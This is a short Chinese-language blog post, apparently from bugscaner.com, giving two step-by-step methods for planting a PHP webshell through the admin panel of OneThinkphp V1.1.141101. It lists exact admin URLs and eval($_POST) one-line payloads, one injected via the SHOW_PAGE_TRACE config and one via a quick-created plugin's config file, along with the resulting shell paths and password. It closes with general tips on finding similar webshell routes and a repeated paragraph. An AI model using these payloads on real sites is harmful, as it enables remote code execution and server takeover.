OneThinkphp管理平台V1.1.141101版本后台getshell
OneThinkphp管理平台V1.1.141101版本后台getshell,很早之前读代码,发现的
第一个方法是 在runtime文件夹可以访问的情况下可以尝试用这个办法
访问 http://127.0.0.1:85/admin.php?s=/Config/index.html 这个路径 找到 SHOW_PAGE_TRACE
SHOW_PAGE_TRACE
配置类型
字符
配置值(配置值)
";} @eval($_POST['bugscaner']);// |
注意上面代码那个回车很重要!
提交
webshell地址 http://127.0.0.1:85/Runtime/Temp/95a1fe934b68ebfee8468bf0bc4f0000.php 密码 bugscaner
第二个方法是 在runtime文件夹不可以访问的情况下尝试使用下面的方法
插件管理 http://127.0.0.1:85/admin.php?s=/Addons/index.html
添加插件 快速创建
*标识名 logging
是否需要配置 选择之后 写入一句话
<?php @eval($_POST['bugscaner']);?> |
确定即可
一句话路径为
http://127.0.0.1:85/Addons/logging/config.php
题外话,通用的挖怎么拿webshell的方式,可以先找管理系统的配置文件,不是写入数据库那种,是写入php文件的,然后跟踪调用,配置文件写入的函数,一步一步逆向,或者直接黑盒测试,逐渐突破'和" ,即可达到拿webshell的目的,在开发代码的时候一定要注意!
本文章为 www.bugscaner.com 原创文章,转载请注明出处!
题外话,通用的挖怎么拿webshell的方式,可以先找管理系统的配置文件,不是写入数据库那种,是写入php文件的,然后跟踪调用,配置文件写入的函数,一步一步逆向,或者直接黑盒测试,逐渐突破'和" ,即可达到拿webshell的目的,在开发代码的时候一定要注意!
本文章为 www.bugscaner.com 原创文章,转载请注明出处!